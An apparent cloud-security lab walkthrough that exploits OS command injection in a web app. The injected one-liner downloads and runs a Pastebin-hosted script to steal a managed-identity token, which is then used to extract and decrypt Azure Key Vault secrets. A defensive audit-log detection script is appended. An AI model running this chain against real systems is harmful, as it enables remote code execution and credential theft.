Learning Objective 19
Task
• In the Attack Lab:
  − Extract the Keys and Secrets from the Key Vault (compositionsecrets).
  − Leverage the Keys to decrypt the Secrets
Applies to: Attack Lab
Topics Covered: Key Vault RBAC Roles, Extract Keys, Secret and Decrypt Secrets
Solution
Recall that in Learning Objective 10 we enumerated that the Managed Identity of the https://analytics.pharmacorphq.com/ application has access to the “compositionsecrets” Key Vault.
So, let’s follow the same steps and request the ARM and Key Vault access tokens.
The PowerShell code snippet below needs to be uploaded to a file hosting site.
This payload helps in getting the ARM access token.
$headers = @{
'secret' = 'B0EC45CEE3344FFF8BFC97E7FA2B2FED'
}
Invoke-RestMethod -Method GET -Uri "http://127.0.0.1:41255/msi/token/?resource=https://management.azure.com&api-version=2017-09-01" -Headers $headers
Copy the code to Pastebin
powershell -c IEX (irm 'https://pastebin.com/raw/0PsAz1ZX')
%70%6f%77%65%72%73%68%65%6c%6c%20%2d%63%20%49%45%58%20%28%69%72%6d%20%27%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%30%50%73%41%7a%31%5a%58%27%29
https://analytics.pharmacorphq.com/main?inputUser={OS_INJECTION}&category-color=danger
access_token : <JWT access token returned by the endpoint>
expires_on   : 7/26/2024 12:00:04 AM +00:00
resource     : https://management.azure.com
token_type   : Bearer
client_id    : 3329FEA7-642E-4C09-B1AD-D8EDBE140267
$Access_Token = "<ARM access token>"
$KeyVault_Token = "<Key Vault access token>"
Connect-AzAccount -AccessToken $Access_Token -KeyVaultAccessToken $KeyVault_Token -AccountId "3329FEA7-642E-4C09-B1AD-D8EDBE140267"
PS C:\AzAppsec\Tools> Get-AzResource
$KeyVault = Get-AzKeyVault
$KeyVault
$KeyVaultSecretName = Get-AzKeyVaultSecret -VaultName $KeyVault.VaultName
$KeyVaultSecretName
$EncryptedValue = Get-AzKeyVaultSecret -VaultName $KeyVault.VaultName -Name $KeyVaultSecretName.Name -AsPlainText
$KeyVaultKey = Get-AzKeyVaultKey -VaultName $KeyVault.VaultName
$KeyVaultKey
Invoke-AzKeyVaultKeyOperation -Operation Decrypt -Algorithm RSA1_5 -VaultName $KeyVault.VaultName -Name $KeyVaultKey.Name -Value (ConvertTo-SecureString -String $EncryptedValue -AsPlainText -Force) | FL
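A defender-side check for the activity above, as an added example that is not part of the original lab material: it scans Key Vault audit records for a managed identity being used from an address other than the application's own outbound IPs. The log records, client ID and IP addresses are constructed placeholders, and `Find-ReplayedIdentityUse` is a hypothetical helper name.

```powershell
# Constructed sample of Key Vault AuditEvent records (values are made up).
# Field names follow the Key Vault resource-log schema.
$auditEvents = @'
[
 {"time":"2024-01-01T09:00:00Z","operationName":"SecretGet","callerIpAddress":"10.1.0.4","identity":{"claim":{"appid":"11111111-1111-1111-1111-111111111111"}}},
 {"time":"2024-01-01T09:30:00Z","operationName":"SecretList","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-1111-1111-1111-111111111111"}}},
 {"time":"2024-01-01T09:30:20Z","operationName":"SecretGet","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-1111-1111-1111-111111111111"}}},
 {"time":"2024-01-01T09:30:41Z","operationName":"KeyList","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-1111-1111-1111-111111111111"}}},
 {"time":"2024-01-01T09:31:05Z","operationName":"KeyDecrypt","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-1111-1111-1111-111111111111"}}}
]
'@ | ConvertFrom-Json

# Assumptions: the managed identity's client ID and the app's outbound IPs.
$WatchedAppId = '11111111-1111-1111-1111-111111111111'   # placeholder client ID
$ExpectedIps  = @('10.1.0.4')                            # placeholder outbound IPs

function Find-ReplayedIdentityUse {
    param([object[]]$Records, [string]$AppId, [string[]]$AllowedIps)

    # Keep only calls made as the watched identity from an unexpected address,
    # then summarise what each such address did.
    $Records |
        Where-Object { $_.identity.claim.appid -eq $AppId -and
                       $_.callerIpAddress -notin $AllowedIps } |
        Group-Object callerIpAddress |
        ForEach-Object {
            $ops   = @($_.Group.operationName | Select-Object -Unique)
            $times = @($_.Group | ForEach-Object { [datetime]$_.time } | Sort-Object)
            [pscustomobject]@{
                CallerIp   = $_.Name
                Operations = $ops -join ','
                FirstSeen  = $times[0]
                LastSeen   = $times[-1]
                # Secret read plus key decrypt from one unexpected address is
                # the full chain this walkthrough performs.
                FullChain  = ($ops -contains 'SecretGet') -and ($ops -contains 'KeyDecrypt')
            }
        }
}

Find-ReplayedIdentityUse -Records $auditEvents -AppId $WatchedAppId -AllowedIps $ExpectedIps |
    Format-List
```

On the constructed sample this reports a single caller, 203.0.113.7, with `FullChain` set to True; the 10.1.0.4 record is the application's own access and is not flagged.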